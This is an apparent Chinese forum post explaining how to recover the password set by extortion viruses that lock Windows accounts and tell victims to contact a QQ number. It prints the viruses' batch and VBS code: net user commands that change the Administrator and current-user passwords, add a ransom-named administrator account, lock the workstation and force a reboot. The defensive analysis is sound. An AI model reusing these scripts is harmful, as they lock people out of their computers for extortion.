如何手动破解敲竹杠病毒(修改电脑开机密码要联系QQ的病...
此类病毒目前只有两种形式,一种是基于脚本的文件,分为批处理和vbs脚本等,另一种是PE文件格式的exe程序,基于上术两种情况,现分别讲解破解方法脚本病毒破解:
文件名字随意,文件格式是.bat和.vbs格式,其对应的文件图标分别是
(如果接收到此类文件最后不要直接双击运行,而要编辑方式打开查看内容),这两种文件密码是明文形式,只要右键编辑打开就能找到密码。CF蓝水晶转英雄级.bat文件打开其内容是:
net user Administrator wsad1234+- -----wsad1234+-即为Administrator帐号对应的密码
net user admin zouzou1314520 -----zouzou1314520即为admin 和要密码加753767785$帐号对应密码
net user 要密码加Q2697588286$ zouzou1314520 /add
net localgroup administrators 要密码加753767785$ /add
rundll32 user32,LockWorkStation
下面对这几行脚本进行简单说明:
net user Administrator wsad1234+- 更改用户名为Administrator 密码为wsad1234+-
net user 要密码加Q2697588286$ zouzou1314520 /add新建一个用户名为要密码加Q2697588286$密码为zouzou1314520的帐户,默认为user组成员。
net localgroup administrators 要密码加753767785$ /add 把用户名要密码加753767785$添加到administrators 组(管理员组)
对于vbs文件,其内容如下:
password="2415123023"
file=fol & "\net.exe"
shut=fol & "\shutdown.exe"
ws.run file & " user %UserName% "+Chr(34) & password & Chr(34),0,True
ws.run shut & " /r /f /t 0",0
其密码已经自己写出来了password="2415123023",对就是2415123023。
综上,脚本病毒更改密码就是使用net user 用户名 密码的命令
针对exe格式的可执行文件,需要使用行为监控工具MD来进行破解,首先是安装此软件(下载地址http://dl.pconline.com.cn/download/52312.html),然后在设置里面改成“正常模式”,接着就运行病毒,进行一步一步监控,等到出现对应更改密码命令行,就可以看到密码了,如下qaz123,其更改密码命令还是使用net user 用户名 密码
以前的60秒关机也是
。。昊情能吃嘛 学习学习技术,加油! 学习学习技术,加油! 支持中国红客联盟(ihonker.org) 感谢楼主的分享~ 感谢分享--做过实操的确不错。